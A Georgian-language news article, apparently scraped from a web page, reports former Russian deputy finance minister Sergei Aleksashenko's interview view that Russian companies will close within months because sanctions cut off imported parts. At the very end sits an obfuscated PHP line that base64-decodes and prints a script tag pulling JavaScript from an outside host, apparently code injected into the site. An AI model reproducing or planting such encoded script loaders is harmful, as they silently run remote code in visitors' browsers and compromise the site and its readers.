celsiusi
ავერსი საქკაბელი
რუსეთის ფინანსთა მინისტრის ყოფილი მოადგილეს და  რუსეთის ცენტრალური ბანკის თავმჯდომარის ყოფილი პირველი მოადგილეს (1995-1998წწ), სერგეი ალექსაშენკოს განცხადებით, რუსეთში საზოგადოება სანქციების გავლენას ჯერჯერობით მკვეთრად ვერ გრძნობს. ამის შესახებ მან რადიო „მაესტროსთან“ ინტერვიუში განაცხადა. 
 
მისივე თქმით, ეს არ არის მაკრომოვლენა, მოვლენა რომელიც შეიძლება თუნდაც სტატისტიკით  ვნახოთ.კომპანიების უმრავლესობა, რომლებმაც ბიზნესის შეჩერების გადაწყვეტილება მიიღეს, თანამშრომლებს ჯერჯერობით უხდიან ხელფასებს და ეს სადღაც ორი-სამი თვე კიდევ გაგრძელდება. 
 
“მათი ძირითადი ნაწილი ალბათ ფიქრობდა, რომ ომი უკრაინაში რამდენიმე კვირაში დასრულდებოდა, ამ დროში უკან დაბრუნებას მოახერხებდნენ და ჩვეულ რეჟიმში მუშაობას გააგრძელებდნენ. მე მეშინია, ვეჭვობ იმას, რომ ეს მოლოდინები არ გამართლდება და ბევრ კომპანიას მოუწევს საწარმოს სრულად დახურვა. მაგალითად, ყველასთვის ცნობილი მაგდონალდი, რომელსაც რუსეთში 850 რესტორანი აქვს და რომლის თვიური სახელფასო ფონდი 50 მილიონი დოლარია. მაგდონალდის პოზიციაა, რომ სამი თვის განმავლობაშ ხელფასი გადაუხადონ თანამშრომლებს, ამ ვადის შემდეგ განიხილავენ საკუთარი ბიზნესის პერსპექტივებს. შესაბამისად, ის ადამიანები, რომლებიც მაგდონალდში, სავაჭრო კომპანიებში, საავტომობილო საწარმოებში მუშაობდნენ, ჯერჯერობით ღებულობენ ხელფასს, შესაბამისად, ბუნებრივია ჯერჯერობით არ ასახულა უმუშევრობაზე მიმდინარე პროცესები.“- განაცხადა  ალექსაშენკომ.  
 
ჟურნალისტის კითხვაზე : მეგობრებს შორის ლავროვი ჩინეთს და ინდოეთს გულისხმობს? თქვენი აზრით, რომელი ქვეყნების ხარჯზე შეუძლია რუსეთს სანქციების სიმძიმის შემცირება მოახდინოს?   
 
„არა, მე ძალიან ხშირად ვიყენებს ასეთ ტერმინს, რუსეთის ეკონომიკა მდგრადი, მაგრამ არაეფექტურია. თანამედროვე გლობალურ სამყაროში რუსეთი არის ნედლეულის მიმწოდებელი ქვეყანა, რაც ექსპორტის 85%-ს შეადგენს, ეს რასაც ჩვენ ბუნება გვაძლევს: გაზი, ნავთობი, ნავთობპრუდუქტები, სასუქები, ლითონები, მარცვეულობა, ის რასაც ადამიანური რესურსი და კაპიტალი არ სჭირდება, ეს ის ჩამონათვალია, რაც რუსეთის ექსპორტის 85%-ს  წარმოადგენს. მაგრამ, ამ პროდუქტებიდან მრავალი სახეობის წარმოებისთვის რუსეთი ყიდულობს საიმპორტო დანადგარებს, ტექნოლოგიებს, საიმპორტო კომპლექტებს. რუსეთის ხელისუფლებისგან ხშირად გვესმის, რომ  რუსეთში წარმოებული ავტომობილების 80%-ი  წარმოადგენს რუსულს, კი ბატონო, მაგრამ ეს ავტომობილები იმპორტირებული მასალებით იწყობა. 50-60% რუსეთსში წარმოებული ავტომობილების იმპორტირებული მასალებისგან შედგება, მგალითად, ავტომობილის ბირთვი, ყველაზე მნიშვნელოვანი ე.წ. შიგთავსია, კორპუსის გარეშე, ყველაფერი იმპორტირებულია. აქედან გამომდინარე, ყველაფრის ჩანაცვლება შეუძლებელია, ამ თვალსაზრისით რუსეთი სრულად იმპორტზეა დამოკიდებული. მე ვფიქრობ, რომ დაახლოებით 5-6 თვეში, ჩვენ ყველანი განსაცვიფრებელ შედეგებს ვნახავთ ამ იმპორტდამოკიდებულების გამო, საწარმოები ერთმანეთის მიყოლებით დაიხურებიან. მათ შორის ის საწარმოები, რომლის მფლობელები რუსი ბიზნესმენები, რუსული კომპანიები არიან. იმიტომ, რომ მათ არ ექნებათ პატარა წვრილმანი, რომლის ღირებულება შიძლება იყოს სულ რაღაც $10, მაგრამ ამ წვრილმანის, ამ დეტალის გარეშე ვერ აწარმოებენ $1000 ღირებულების პროდუქციას“ - უპასუხა სერგეი ალექსაშენკომ. 
 
 
998
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");